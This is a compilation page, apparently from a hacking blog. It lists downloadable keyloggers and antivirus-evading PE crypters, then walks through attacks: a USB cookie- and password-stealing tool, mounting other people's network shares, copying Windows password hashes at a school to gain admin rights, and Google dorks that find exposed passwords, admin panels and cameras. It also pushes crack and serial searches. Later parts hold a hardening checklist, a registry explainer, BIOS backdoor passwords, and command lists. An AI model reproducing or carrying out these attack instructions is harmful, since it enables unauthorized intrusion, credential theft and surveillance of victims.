KillSSKC is an uninstaller for SSKC v1.x, v2.0. It searches in process list to locate the SSKC by name and if located deletes the EXE and the DLL.

PEncrypt v4.0Ø

Nice few improvement from the previous version. Catches few more Application level debuggers, Tracers etc.. Beats detection by AVP (most of the times)

PEncrypt v4.0ß

PEncrypt v4.0ß is best of all the versions! Features include.. SoftICE & ICEDump Detection routines. Anti /TRACEX. Anti Application Level Debuggers. Polymorphic Encrypted Decryptors ( a lame one though ). and ofcourse Multi-layer encryption. So Check it out!!!!

SSKC v2.0 (BugFixed)

SSKC v2.0 ( Super Stealth Key Capturer) is a keylogger with SMTP support. It can kill AntiVirus and FireWalls and similar applications. It comes with a config utility TweakSSKC. Have FUN!!! ( thanx toma iulica for reporting the bug )

ELFCrypt v1.0

A small update to v0.666. Download Source!

ELFCrypt v0.666

ELFCrypt is a simple cryptor for linux executable ( ELF)...

PEncrypt v3.1 (Final)

PEncrypt v3.1 is the most sophisticated of all the version of PEncrypt. It can now generate Polymorphic Decryptor which adds security to your application. Its a must download from this page!!

PEncrypt v3.0

PEncrypt v3.0 is highly stable PE encryptor for Win9x (can be used in Win2k/ME/Xp with some options off)... Its has powerful Anti-* routines than screws up some system level debuggers! Read README.TXT for more details!

PEditor v1.0 (Updated)

PE Editor is a simple program that can used to edit the main parts of the PE Header... Source Included!!

AntiCrypt

A Generic OEP (Original Entry Point) Seeker... read README.TXT for more details!

PEncrypt v2.0

PEncrypt v2.0 - This program is much above the class of PEncrypt v1.0, which doesn't come with anti-* stuff that this version of PEncrypt possess! Main Features :- Anti-Dump, Anti-Dasm, Anti-Trace, Anti-SoftICE, Anti-Debuggers, Ring0 etc...

CHTML

CHTML - Crypted Hyper Text Markup Language... A utility that CRYPTS normal HTML pages so that its source remains senseless to a casual _code stealer_

iSeekU

A ICQ Send Message Utiltiy. Send Messages Anonymously to anybody using ICQ... you call it a ICQ half-clone...

UE

Unkracable Encryption - Create Self Extractable Encryped Files

DeRAR

Extract Your RAR Archives Quickly - Very Fast Unarchiver

Scream

Media Player - Plays MP3, WAV, AU, SND, WMA, MID etc..

OrDidI

SMTP Client - Send Your Mail Anonymously - Very Fast, Robust ...

M3UEd

Playlist Creator in M3U Format, Use it to create Playlist that can be played from Media Player

FAT32Exp

Explorer Program similar to Norton Commander,.. Browse thru folder, open files, execute 'em and more..

SSKC

Super Stealth Key Capturer - A Stealth Key Logger, It hides its existence from CTRL-ALT-DEL.

VBscrypt

Visual Basic Script Encrypting Tool. Decryptors are polymorphic with random variables of variable length.

Valhalla

Valhalla "the unlimited digits" Calculator. It has some funcitons like GCD, Prime Checking, Perfect Square Checking etc..

Patch Maker

Its a small yet efficient patch maker.. which i have christened it as 'A Silly Patch Maker'. Please read Instruction before using it.

PEncrypt v1.0

PEncrypt - A PE (Portable Executable) Encryption Utility. Use simple XOR encryption! So it may get detected as other common debuggers! (I have posted this for historical reasons only!)

Go to : BLOOD ROOM TEAM

regards

http://jayson-hacking.blogspot.com/

Hack password by usb

USB hack

With this tool you can steal anyone's cookies just by inserting USB Drive into their PC

it means u can know ids,passwords,and the sites he is viewing daily

u can also know much more with this usb hack

first download Usb hack tool from

http://sandy.karnati.googlepages.com/USBSwitchblade_noU3.rar

UNzip this .rar files

and paste it in ur Flash drive

then Double click on Nircmd(a .bat file which u can see after extracting USBSwitchblade_noU3.rar)

and click on copy to windows

After this Make a folder with folder name Dump in ur Flash drive

Hack Network Hard Drives using the command prompt.

In this step by step guide you will learn about: How to Hack Network Hard Drives using the command prompt.

Things to remember

* CP = Command Prompt

* HDs = Hard Drives

Step by Step:

1. Open command prompt if it's block and you don't know how to get to it go to Using the command prompt under a limited account and then continue to step #2.

2. Once in command prompt type

c:\windows>nbtstat -a 203.195.136.156

(instead of the I.P. address type the real I.P. address or the name of the computer your trying to get to) and if you don't know how to get the name of the computer then go to what to do after hacking the C:\ drive and then continue to step #3.

3. Let say that it gives you this

NetBIOS Remote Machine Name Table

Name Type Status

---------------------------------------------

user <00> UNIQUE Registered

workgroup <00> GROUP Registered

user <03> UNIQUE Registered

user <20> UNIQUE Registered

MAC Address = 00-02-44-14-23-E6

The number <20> shows that the victim has enabled the File And Printer Sharing.

-------------------------------------

NOTE - If you do not get this number there are three possible answers

A. You do not get the number <20> . This shows that the victim has not enabled the File and Printer Sharing.

B. You get "Host Not found". This shows that the port 139 is closed or the ip address or computer name doesn't exist or the computer you are trying to get to is turned off.

C. its still doesn’t matter if you don't get the <20> because this is to hack hard drives and not printers

4. Now in command prompt type

c:\windows>net view \\203.195.136.156

Let's suppose we get the following output

Shared resources at \\203.195.136.156

The computer's name will be here

Share name Type Used as Comment

-------------------------------------------

CDISK Disk

The command completed successfully.

5. The name CDISK is one of the things that being shared on command prompt type (the word Disk at the side its just saying what the the thing being shared is a printer, disk or a file)

c:\windows>net use k: \\203.195.136.156\CDISK

You may replace k letter by any other letter, If the command is successful we will get the confirmation - The command was completed successfully

Now just double click on the My Computer icon on your desktop

and there will be a new drive there with the letter that you replaced K with.

Hack college and school system

Do u want to college system admin rights

i ll tell u some tips it may be workin for some body and not for somebody

okay lets do it!

system requirements

hardware

1. pen drive

2. cd drive

software

1.any linux live cd

2.LCP-password auditing tool

get any linux live cd like dynabolic or something

i.boot using linux live cd ((NOTE: once u get got game over try it at ur own risk ))

ii.copy config folder to ur pendrive

config folder path c:/windows/system32/config

main files are sam and system

iii.now u got hashed password in ur pendrive.

((Note: some live cd are not supportive to access to config folder try to copy using any software that u know))

iv. google LCP software download

v. install LCP in any system and import ur sam and system files from pendrive that u copied

vi. if the password is huge brute force sucks!!!!

vii.if u got more than one computer pls go ahead and bruteforce

viii. its a probabilty that u may get password or u may not

ix. but i got shotgun !!! what r u waiting for get admin rights and be a king or queen

try it at ur own risk!!

Get the Xp Product Code From its CD Itself

There is a way to get the xp product code from the cd just explorer the cd then open the folder I386

then open the file UNATTEND.TXT and scroll down to the last line and

it goes to show what dumbasses microsoft are u have a product code.

Have fun u never need to search for a product code for xp again...!!!!

Google Hacking

By jayson on jan.30, 2009, under Info

Use Google as a warez search engine a.k.a Get Free Stuff!

1.Go to www.google.com

2.In the Search Bar type in:“intitle:index of” and then type in the keyword for whatever you are looking for.

So for example if I want to find some linkin park songs I would type in this:

“intitle:index of” LINKINK PARK(OR SONG NAME) MP3(YES WE CAN ADD EXTENSION ALSO)

View Security Cameras Worldwide. – This will let you hack into random live scurity cameras all over the world and operate them.

1.Go to www.google.com

2.In the search bar type in:inurl:”viewerframe?mode refresh”

3.Then go to any of the search results and boom here is your camera.

Searching crack

for searching crack u can use following command

crack:name of the software whose crack u want to download

eg-.suppose i want to download crack of nfs most wanted then i type

crack:need for speed most wanted

Searching serials

just type software/game name and after that type 94fbr

eg.-windvd 8 94fbr

how it is working

actually 94fbr a key for windows 2003 which Microsoft distribute free in very big amount

so when we hit 94fbr Google relates it to serial no. and return serial no. of specify software.

POWERED BY HIT JAMMER 1.0!

Allows you to gain access to the admin panel of site running

hitjamer 1.0 script.

1.Go to google.com

2.In the search bar type in:POWERED BY HIT JAMMER 1.0!

3.Look for webpages that have POWERED BY HIT JAMMER 1.0! slogan on the bottom of the main page

4.Once you found the page that has POWERED BY HIT JAMMER 1.0! slogan on the bottom replace the url with this

one:www.nameofsite.com/admin/admin.php <— That should take you to the admin panel.

Example: If the site’s name is www.uber1337xxoxox.com/index.php/ifuckgoats/lol

then just replace it with this www.uber1337xxoxox.com/admin/admin.php

FTP HACK

This hack shows all info (including username and passwords) for websites running on ws_ftp sofware.

1.Go to google.com

2.In searchbar type in: intitle:index of ws_ftp.ini

3.Go to any result page and find a file called ws_ftp.ini (press ctrl+f for autosearch)

After you found ws_ftp, click on it and it will give you a whole bunch of private stuff.Look for something along the lines

of PWD=blahblahblah.That’s your password.It’s encrypted.So use an MD5 hash cracker or johntheripper to crack the

password.

how to search google for RAPIDSHARE links

If you wanna find some apps, files etc on rapidshare.de via google, do the following.

Paste this into the google search window (not the adress bar):

site:rapidshare.de -filetype:zip OR rar daterange:2453402-2453412

this searches the site rapidshare.de for any file that is rar or zip, and

has been indexed between 1-11 February.

dvd site:rapidshare.de -filetype:zip OR rar daterange:2453402-2453412

This is the same search but it specifically searches for “dvd” with the same

search criteria, so any app posted with the word dvd in it will be found.

SOME IMPORTANT SEARCH STRING

Try these search string in different way

intitle:”Index of” passwords modified

allinurl:auth_user_file.txt

“access denied for user” “using password”

“A syntax error has occurred” filetype:ihtml

allinurl: admin mdb

“ORA-00921: unexpected end of SQL command”

inurl:passlist.txt

“Index of /backup”

“Chatologica MetaSearch” “stack tracking:”

“parent directory ” /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

“parent directory ” DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

“parent directory “Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

“parent directory ” Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

“parent directory ” MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

“parent directory ” Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

Notice that I am only changing the word after the parent directory, change it to what you want and you will get a lot of stuff.

nurl:microsoft filetype:iso

You can change the string to watever you want, ex. microsoft to adobe, iso to zip etc…

“# -FrontPage-” inurl:service.pwd

Frontpage passwords.. very nice clean search results listing !!

“AutoCreate=TRUE password=*”

This searches the password for “Website Access Analyzer”, a Japanese software that creates webstatistics. For those who can read Japanese, check out the author’s site at: coara.or.jp/~passy/ [coara.or.jp/~passy/]

“http://*:*@www” domainname

This is a query to get inline passwords from search engines (not just Google), you must type in the query followed with the the domain name without the .com or .net

“sets mode: +k”

This search reveals channel keys (passwords) on IRC as revealed from IRC chat logs.

allinurl: admin mdb

Not all of these pages are administrator’s access databases containing usernames, passwords and other sensitive information, but many are!

allinurl:auth_user_file.txt

DCForum’s password file. This file gives a list of (crackable) passwords, usernames and email addresses for DCForum and for DCShop (a shopping cart program(!!!).

intitle:”Index of” config.php

This search brings up sites with “config.php” files. To skip the technical discussion, this configuration file contains both a username and a password for an SQL database. Most sites with forums run a PHP message base. This file gives you the keys to that forum, including FULL ADMIN access to the database.

eggdrop filetype:user user

These are eggdrop config files. Avoiding a full-blown descussion about eggdrops and IRC bots, suffice it to say that this file contains usernames and passwords for IRC users

To locate proxy servers

try these queries:

inurl:”nph-proxy.cgi” “Start browsing”

or

“this proxy is working fine!” “enter *” “URL***” * visit

These queries locate online public proxy servers that can be used for

testing purposes.

Calculator

This trick is extra cool: You can use the blank Google search box as a calculator. Just enter an equation, like 2+2, and then press Enter to have Google tell you 2+2=4. For multiplication, use the asterisk (*), like this: 2*3. For division, use the slash (/), like this: 10/3. You can also use the search box to perform unit conversions, like this: 5 kilometers in miles or how many teaspoons in a cup? For a chart listing of units of measure Google can convert, The calculator works for simple equations and for some seriously complex operations, too, like logarithms and trigonometric functions. You can find a rundown of all its capabilities at. And if you know what a physical constant is or the phrase “base of the natural system of logarithms”

Changing the Number of Results

In the middle of a Google results URL, you can sometimes find num=, which tells you the number of search results Google gives you per page of results. You can temporarily change the number of results to anything from 1 to 100 simply by altering the number in the URL and then pressing Enter. Most of the time, search results are easiest to read when you’ve got 10, 20, or 30 per page . But this trick is a quick way to amp up the number of results on a page for the rare times when you want to review a lot of them at once or compare results 1 and 100 on one page.

Unsafe searching.

The SafeSearch filter tells Google to remove potentially offensive links from your results. The problem is, sometimes the filter gets carried away and removes things you need . To make sure the filter is off, add this to the end of your URL: &safe=off. To make sure it’s on, add &safe=on.

Protect from being hacked

1. U may avoid using Internet Explorer(old versions) and make the switch to Opera, it's more secure, plain and simple.

2. Get Spybot Search and Destroy or Spyware Doctor and immediately update it.

3. Get Adaware SE and immediately update it.

(Use both as a 1-2 punch on infected client computers and between the two there's not much they won't kill)

4. Update your anti virus,

5. Boot into safe mode and run all three scans (once in a month)

6. While the scans are going check your registry (Click start --> Run and type regedit to get intot he registry) and look in HKEY_CurrentUser/software/microsoft/windows/currentversion/run & HKEY_Local_Machine/software/microsoft/windows/currentversion/run. Verify that all programs listed are legitimate and wanted.

7. If or when your antivirus scan comes across anything, search for that file name in your registry and delete it, at least quarantine it.

8. Use explorer to go to the windows/system32 folder and sort by date. If you haven't already done so, make sure you can see the entire file names. click Tools --> Folder Options and unclick the box labeled "Hide extensions for known file types" and under Hidden files and folders click "Show hidden files and folders." However, make sure you choose "Hide protected operating system files" so you don't accidentally remove anything that would cripple your computer.. You are looking for recent files with names ending with .exe and .dll that look suspicious. Major culprits will have gibberish names such as alkjdlkjfa.exe.

9. Once you can get clean scans in safe mode, reboot in normal mode and scan all over again. If you can't get a clean scan in regular mode then you have something more persistant that could take more research.

10. Make sure your firewall doesn't have strange exceptions.

11. If you suspect anything that is going wrong with your computer is the action of a stalker, on a more secure system change all your major passwords, mostly bu using a virtual keyboard(to prevent keyloggers).

12. If your system has been specifically targeted and hacked you can never be 100% sure that your system is no longer compromised so start with 11, make backups of personal files on the infected system and format and re-install Windows.

Good luck!

What is the Registry?

The Registry is a database used to store settings and options for the 32 bit versions of Microsoft Windows including Windows 95, 98, ME and NT/2000. It contains information and settings for all the hardware, software, users, and preferences of the PC. Whenever a user makes changes to a Control Panel settings, or File Associations, System Policies, or installed software, the changes are reflected and stored in the Registry.

The physical files that make up the registry are stored differently depending on your version of Windows; under Windows 95 & 98 it is contained in two hidden files in your Windows directory, called USER.DAT and SYSTEM.DAT, for Windows Me there is an additional CLASSES.DAT file, while under Windows NT/2000 the files are contained seperately in the %SystemRoot%\System32\Config directory. You can not edit these files directly, you must use a tool commonly known as a "Registry Editor" to make any changes (using registry editors will be discussed later in the article).

The Structure of The Registry

The Registry has a hierarchal structure, although it looks complicated the structure is similar to the directory structure on your hard disk, with Regedit being similar to Windows Explorer.

Each main branch (denoted by a folder icon in the Registry Editor, see left) is called a Hive, and Hives contains Keys. Each key can contain other keys (sometimes referred to as sub-keys), as well as Values. The values contain the actual information stored in the Registry. There are three types of values; String, Binary, and DWORD - the use of these depends upon the context.

There are six main branches, each containing a specific portion of the information stored in the Registry. They are as follows:

* HKEY_CLASSES_ROOT - This branch contains all of your file association mappings to support the drag-and-drop feature, OLE information, Windows shortcuts, and core aspects of the Windows user interface.

* HKEY_CURRENT_USER - This branch links to the section of HKEY_USERS appropriate for the user currently logged onto the PC and contains information such as logon names, desktop settings, and Start menu settings.

* HKEY_LOCAL_MACHINE - This branch contains computer specific information about the type of hardware, software, and other preferences on a given PC, this information is used for all users who log onto this computer.

* HKEY_USERS - This branch contains individual preferences for each user of the computer, each user is represented by a SID sub-key located under the main branch.

* HKEY_CURRENT_CONFIG - This branch links to the section of HKEY_LOCAL_MACHINE appropriate for the current hardware configuration.

* HKEY_DYN_DATA - This branch points to the part of HKEY_LOCAL_MACHINE, for use with the Plug-&-Play features of Windows, this section is dymanic and will change as devices are added and removed from the system.

Each registry value is stored as one of five main data types:

* REG_BINARY - This type stores the value as raw binary data. Most hardware component information is stored as binary data, and can be displayed in an editor in hexadecimal format.

* REG_DWORD - This type represents the data by a four byte number and is commonly used for boolean values, such as "0" is disabled and "1" is enabled. Additionally many parameters for device driver and services are this type, and can be displayed in REGEDT32 in binary, hexadecimal and decimal format, or in REGEDIT in hexadecimal and decimal format.

* REG_EXPAND_SZ - This type is an expandable data string that is string containing a variable to be replaced when called by an application. For example, for the following value, the string "%SystemRoot%" will replaced by the actual location of the directory containing the Windows NT system files. (This type is only available using an advanced registry editor such as REGEDT32)

* REG_MULTI_SZ - This type is a multiple string used to represent values that contain lists or multiple values, each entry is separated by a NULL character. (This type is only available using an advanced registry editor such as REGEDT32)

* REG_SZ - This type is a standard string, used to represent human readable text values.

Ultimate Guide To By pass BIOS Password

BIOS passwords can add an extra layer of security for desktop and laptop computers. They are used to either prevent a user from changing the BIOS settings or to prevent the PC from booting without a password. Unfortunately, BIOS passwords can also be a liability if a user forgets their password, or changes the password to intentionally lock out the corporate IT department. Sending the unit back to the manufacturer to have the BIOS reset can be expensive and is usually not covered in the warranty. Never fear, all is not lost. There are a few known backdoors and other tricks of the trade that can be used to bypass or reset the BIOS

DISCLAIMER

This article is intended for IT Professionals and systems administrators with experience servicing computer hardware. It is not intended for home users, hackers, or computer thieves attempting to crack the password on a stolen PC. Please do not attempt any of these procedures if you are unfamiliar with computer hardware, and please use this information responsibly. LabMice.net is not responsible for the use or misuse of this material, including loss of data, damage to hardware, or personal injury.

Before attempting to bypass the BIOS password on a computer, please take a minute to contact the hardware manufacturer support staff directly and ask for their recommended methods of bypassing the BIOS security. In the event the manufacturer cannot (or will not) help you, there are a number of methods that can be used to bypass or reset the BIOS password yourself. They include:

Using a manufacturers backdoor password to access the BIOS

Use password cracking software

Reset the CMOS using the jumpers or solder beads.

Removing the CMOS battery for at least 10 minutes

Overloading the keyboard buffer

Using a professional service

Please remember that most BIOS passwords do not protect the hard drive, so if you need to recover the data, simply remove the hard drive and install it in an identical system, or configure it as a slave drive in an existing system. The exception to this are laptops, especially IBM Thinkpads, which silently lock the hard drive if the supervisor password is enabled. If the supervisor password is reset without resetting the and hard drive as well, you will be unable to access the data on the drive.

--------------------------------------------------------------------------------

Backdoor passwords

Many BIOS manufacturers have provided backdoor passwords that can be used to access the BIOS setup in the event you have lost your password. These passwords are case sensitive, so you may wish to try a variety of combinations. Keep in mind that the key associated to "_" in the US keyboard corresponds to "?" in some European keyboards. Laptops typically have better BIOS security than desktop systems, and we are not aware of any backdoor passwords that will work with name brand laptops.

WARNING: Some BIOS configurations will lock you out of the system completely if you type in an incorrect password more than 3 times. Read your manufacturers documentation for the BIOS setting before you begin typing in passwords

Award BIOS backdoor passwords:

ALFAROME ALLy aLLy aLLY ALLY aPAf _award AWARD_SW AWARD?SW AWARD SW AWARD PW AWKWARD awkward BIOSTAR CONCAT CONDO Condo d8on djonet HLT J64 J256 J262 j332 j322 KDD Lkwpeter LKWPETER PINT pint SER SKY_FOX SYXZ syxz shift + syxz TTPTHA ZAAADA ZBAAACA ZJAAADC 01322222

589589 589721 595595 598598

AMI BIOS backdoor passwords:

AMI AAAMMMIII BIOS PASSWORD HEWITT RAND AMI?SW AMI_SW LKWPETER A.M.I. CONDO

PHOENIX BIOS backdoor passwords:

phoenix, PHOENIX, CMOS, BIOS

MISC. COMMON PASSWORDS

ALFAROME BIOSTAR biostar biosstar CMOS cmos LKWPETER lkwpeter setup SETUP Syxz Wodj

OTHER BIOS PASSWORDS BY MANUFACTURER

Manufacturer Password

VOBIS & IBM merlin

Dell Dell

Biostar Biostar

Compaq Compaq

Enox xo11nE

Epox central

Freetech Posterie

IWill iwill

Jetway spooml

Packard Bell bell9

QDI QDI

Siemens SKY_FOX

TMC BIGO

Toshiba Toshiba

TOSHIBA BIOS

Most Toshiba laptops and some desktop systems will bypass the BIOS password if the left shift key is held down during boot

IBM APTIVA BIOS

Press both mouse buttons repeatedly during the boot

--------------------------------------------------------------------------------

Password cracking software

The following software can be used to either crack or reset the BIOS on many chipsets. If your PC is locked with a BIOS administrator password that will not allow access to the floppy drive, these utilities may not work. Also, since these utilities do not come from the manufacturer, use them cautiously and at your own risk.

Cmos password recovery tools 3.1

!BIOS (get the how-to article)

RemPass

KILLCMOS

--------------------------------------------------------------------------------

Using the Motherboard "Clear CMOS" Jumper or Dipswitch settings

Many motherboards feature a set of jumpers or dipswitches that will clear the CMOS and wipe all of the custom settings including BIOS passwords. The locations of these jumpers / dipswitches will vary depending on the motherboard manufacturer and ideally you should always refer to the motherboard or computer manufacturers documentation. If the documentation is unavailable, the jumpers/dipswitches can sometimes be found along the edge of the motherboard, next to the CMOS battery, or near the processor. Some manufacturers may label the jumper / dipswitch CLEAR - CLEAR CMOS - CLR - CLRPWD - PASSWD - PASSWORD - PWD. On laptop computers, the dipswitches are usually found under the keyboard or within a compartment at the bottom of the laptop.

Please remember to unplug your PC and use a grounding strip before reaching into your PC and touching the motherboard. Once you locate and rest the jumper switches, turn the computer on and check if the password has been cleared. If it has, turn the computer off and return the jumpers or dipswitches to its original position.

--------------------------------------------------------------------------------

Removing the CMOS Battery

The CMOS settings on most systems are buffered by a small battery that is attached to the motherboard. (It looks like a small watch battery). If you unplug the PC and remove the battery for 10-15 minutes, the CMOS may reset itself and the password should be blank. (Along with any other machine specific settings, so be sure you are familiar with manually reconfiguring the BIOS settings before you do this.) Some manufacturers backup the power to the CMOS chipset by using a capacitor, so if your first attempt fails, leave the battery out (with the system unplugged) for at least 24 hours. Some batteries are actually soldered onto the motherboard making this task more difficult. Unsoldering the battery incorrectly may damage your motherboard and other components, so please don't attempt this if you are inexperienced. Another option may be to remove the CMOS chip from the motherboard for a period of time.

Note: Removing the battery to reset the CMOS will not work for all PC's, and almost all of the newer laptops store their BIOS passwords in a manner which does not require continuous power, so removing the CMOS battery may not work at all. IBM Thinkpad laptops lock the hard drive as well as the BIOS when the supervisor password is set. If you reset the BIOS password, but cannot reset the hard drive password, you may not be able to access the drive and it will remain locked, even if you place it in a new laptop. IBM Thinkpads have special jumper switches on the motherboard, and these should be used to reset the system.

--------------------------------------------------------------------------------

Overloading the KeyBoard Buffer

On some older computer systems, you can force the CMOS to enter its setup screen on boot by overloading the keyboard buffer. This can be done by booting with the keyboard or mouse unattached to the systems, or on some systems by hitting the ESC key over 100 times in rapid succession.

--------------------------------------------------------------------------------

Jumping the Solder Beads on the CMOS

It is also possible to reset the CMOS by connecting or "jumping" specific solder beads on the chipset. There are too many chipsets to do a breakdown of which points to jump on individual chipsets, and the location of these solder beads can vary by manufacturer, so please check your computer and motherboard documentation for details. This technique is not recommended for the inexperienced and should be only be used as a "last ditch" effort.

--------------------------------------------------------------------------------

Using a professional service

If the manufacturer of the laptop or desktop PC can't or won't reset the BIOS password, you still have the option of using a professional service. Password Crackers, Inc., offers a variety of services for desktop and laptop computers for between $100 and $400. For most of these services, you'll need to provide some type of legitimate proof of ownership. This may be difficult if you've acquired the computer second hand or from an online auction.

Internet Explorer Shortcuts

CTRL+A - Select all items on the current page

CTRL+D - Add the current page to your Favorites

CTRL+E - Open the Search bar

CTRL+F - Find on this page

CTRL+H - Open the History bar

CTRL+I - Open the Favorites bar

CTRL+N - Open a new window

CTRL+O - Go to a new location

CTRL+P - Print the current page or active frame

CTRL+S - Save the current page

CTRL+W - Close current browser window

CTRL+ENTER - Adds the http://www. (url) .com

SHIFT+CLICK - Open link in new window

BACKSPACE - Go to the previous page

ALT+HOME - Go to your Home page

HOME - Move to the beginning of a document

TAB - Move forward through items on a page

END - Move to the end of a document

ESC - Stop downloading a page

F11 - Toggle full-screen view

F5 - Refresh the current page

F4 - Display list of typed addresses

F6 - Change Address bar and page focus

ALT+RIGHT ARROW - Go to the next page

SHIFT+CTRL+TAB - Move back between frames

SHIFT+F10 - Display a shortcut menu for a link

SHIFT+TAB - Move back through the items on a page

CTRL+TAB - Move forward between frames

CTRL+C - Copy selected items to the clipboard

CTRL+V - Insert contents of the clipboard

ENTER - Activate a selected link

HOME - Move to the beginning of a document

END - Move to the end of a document

F1 - Display Internet Explorer Help

Run Commands

compmgmt.msc - Computer management

devmgmt.msc - Device manager

diskmgmt.msc - Disk management

dfrg.msc - Disk defrag

eventvwr.msc - Event viewer

fsmgmt.msc - Shared folders

gpedit.msc - Group policies

lusrmgr.msc - Local users and groups

perfmon.msc - Performance monitor

rsop.msc - Resultant set of policies

secpol.msc - Local security settings

services.msc - Various Services

msconfig - System Configuration Utility

regedit - Registry Editor

msinfo32 _ System Information

sysedit _ System Edit

win.ini _ windows loading information(also system.ini)

winver _ Shows current version of windows

mailto: _ Opens default email client

command _ Opens command prompt

Run Commands to access the control panel:

Add/Remove Programs control appwiz.cpl

Date/Time Properties control timedate.cpl

Display Properties control desk.cpl

FindFast control findfast.cpl

Fonts Folder control fonts

Internet Properties control inetcpl.cpl

Keyboard Properties control main.cpl keyboard

Mouse Properties control main.cpl

Multimedia Properties control mmsys.cpl

Network Properties control netcpl.cpl

Password Properties control password.cpl

Printers Folder control printers

Sound Properties control mmsys.cpl sounds

System Properties control sysdm.cpl

Command Prompt:

ANSI.SYS Defines functions that change display graphics, control cursor movement, and reassign keys.

APPEND Causes MS-DOS to look in other directories when editing a file or running a command.

ARP Displays, adds, and removes arp information from network devices.

ASSIGN Assign a drive letter to an alternate letter.

ASSOC View the file associations.

AT Schedule a time to execute commands or programs.

ATMADM Lists connections and addresses seen by Windows ATM call manager.

ATTRIB Display and change file attributes.

BATCH Recovery console command that executes a series of commands in a file.

BOOTCFG Recovery console command that allows a user to view, modify, and rebuild the boot.ini

BREAK Enable / disable CTRL + C feature.

CACLS View and modify file ACL's.

CALL Calls a batch file from another batch file.

CD Changes directories.

CHCP Supplement the International keyboard and character set information.

CHDIR Changes directories.

CHKDSK Check the hard disk drive running FAT for errors.

CHKNTFS Check the hard disk drive running NTFS for errors.

CHOICE Specify a listing of multiple options within a batch file.

CLS Clears the screen.

CMD Opens the command interpreter.

COLOR Easily change the foreground and background color of the MS-DOS window.

COMP Compares files.

COMPACT Compresses and uncompress files.

CONTROL Open control panel icons from the MS-DOS prompt.

CONVERT Convert FAT to NTFS.

COPY Copy one or more files to an alternate location.

CTTY Change the computers input/output devices.

DATE View or change the systems date.

DEBUG Debug utility to create assembly programs to modify hardware settings.

DEFRAG Re-arrange the hard disk drive to help with loading programs.

DEL Deletes one or more files.

DELETE Recovery console command that deletes a file.

DELTREE Deletes one or more files and/or directories.

DIR List the contents of one or more directory.

DISABLE Recovery console command that disables Windows system services or drivers.

DISKCOMP Compare a disk with another disk.

DISKCOPY Copy the contents of one disk and place them on another disk.

DOSKEY Command to view and execute commands that have been run in the past.

DOSSHELL A GUI to help with early MS-DOS users.

DRIVPARM Enables overwrite of original device drivers.

ECHO Displays messages and enables and disables echo.

EDIT View and edit files.

EDLIN View and edit files.

EMM386 Load extended Memory Manager.

ENABLE Recovery console command to enable a disable service or driver.

ENDLOCAL Stops the localization of the environment changes enabled by the setlocal command.

ERASE Erase files from computer.

EXIT Exit from the command interpreter.

EXPAND Expand a M*cros*ft Windows file back to it's original format.

EXTRACT Extract files from the M*cros*ft Windows cabinets.

FASTHELP Displays a listing of MS-DOS commands and information about them.

FC Compare files.

FDISK Utility used to create partitions on the hard disk drive.

FIND Search for text within a file.

FINDSTR Searches for a string of text within a file.

FIXBOOT Writes a new boot sector.

FIXMBR Writes a new boot record to a disk drive.

FOR Boolean used in batch files.

FORMAT Command to erase and prepare a disk drive.

FTP Command to connect and operate on a FTP server.

FTYPE Displays or modifies file types used in file extension associations.

GOTO Moves a batch file to a specific label or location.

GRAFTABL Show extended characters in graphics mode.

HELP Display a listing of commands and brief explanation.

IF Allows for batch files to perform conditional processing.

IFSHLP.SYS 32-bit file manager.

IPCONFIG Network command to view network adapter settings and assigned values.

KEYB Change layout of keyboard.

LABEL Change the label of a disk drive.

LH Load a device driver in to high memory.

LISTSVC Recovery console command that displays the services and drivers.

LOADFIX Load a program above the first 64k.

LOADHIGH Load a device driver in to high memory.

LOCK Lock the hard disk drive.

LOGON Recovery console command to list installations and enable administrator login.

MAP Displays the device name of a drive.

MD Command to create a new directory.

MEM Display memory on system.

MKDIR Command to create a new directory.

MODE Modify the port or display settings.

MORE Display one page at a time.

MOVE Move one or more files from one directory to another directory.

MSAV Early M*cros*ft Virus scanner.

MSD Diagnostics utility.

MSCDEX Utility used to load and provide access to the CD-ROM.

NBTSTAT Displays protocol statistics and current TCP/IP connections using NBT

NET Update, fix, or view the network or network settings

NETSH Configure dynamic and static network information from MS-DOS.

NETSTAT Display the TCP/IP network protocol statistics and information.

NLSFUNC Load country specific information.

NSLOOKUP Look up an IP address of a domain or host on a network.

PATH View and modify the computers path location.

PATHPING View and locate locations of network latency.

PAUSE Command used in batch files to stop the processing of a command.

PING Test / send information to another network computer or network device.

POPD Changes to the directory or network path stored by the pushd command.

POWER Conserve power with computer portables.

PRINT Prints data to a printer port.

PROMPT View and change the MS-DOS prompt.

PUSHD Stores a directory or network path in memory so it can be returned to at any time.

QBASIC Open the QBasic.

RD Removes an empty directory.

REN Renames a file or directory.

RENAME Renames a file or directory.

RMDIR Removes an empty directory.

ROUTE View and configure windows network route tables.

RUNAS Enables a user to execute a program on another computer.

SCANDISK Run the scandisk utility.

SCANREG Scan registry and recover registry from errors.

SET Change one variable or string to another.

SETLOCAL Enables local environments to be changed without affecting anything else.

SETVER Change MS-DOS version to trick older MS-DOS programs.

SHARE Installs support for file sharing and locking capabilities.

SHIFT Changes the position of replaceable parameters in a batch program.

SHUTDOWN Shutdown the computer from the MS-DOS prompt.

SMARTDRV Create a disk cache in conventional memory or extended memory.

SORT Sorts the input and displays the output to the screen.

START Start a separate window in Windows from the MS-DOS prompt.

SUBST Substitute a folder on your computer for another drive letter.

SWITCHES Remove add functions from MS-DOS.

SYS Transfer system files to disk drive.

TELNET Telnet to another computer / device from the prompt.

TIME View or modify the system time.

TITLE Change the title of their MS-DOS window.

TRACERT Visually view a network packets route across a network.

TREE View a visual tree of the hard disk drive.

TYPE Display the contents of a file.

UNDELETE Undelete a file that has been deleted.

UNFORMAT Unformat a hard disk drive.

UNLOCK Unlock a disk drive.

VER Display the version information.

VERIFY Enables or disables the feature to determine if files have been written properly.

VOL Displays the volume information about the designated drive.

XCOPY Copy multiple files, directories, and/or drives from one location to another.

TRUENAME When placed before a file, will display the whole directory in which it exists

TASKKILL It allows you to kill those unneeded or locked up applications

Windows Explorer Shortcuts:

ALT+SPACEBAR - Display the current window’s system menu

SHIFT+F10 - Display the item's context menu

CTRL+ESC - Display the Start menu

ALT+TAB - Switch to the window you last used

ALT+F4 - Close the current window or quit

CTRL+A - Select all items

CTRL+X - Cut selected item(s)

CTRL+C - Copy selected item(s)

CTRL+V - Paste item(s)

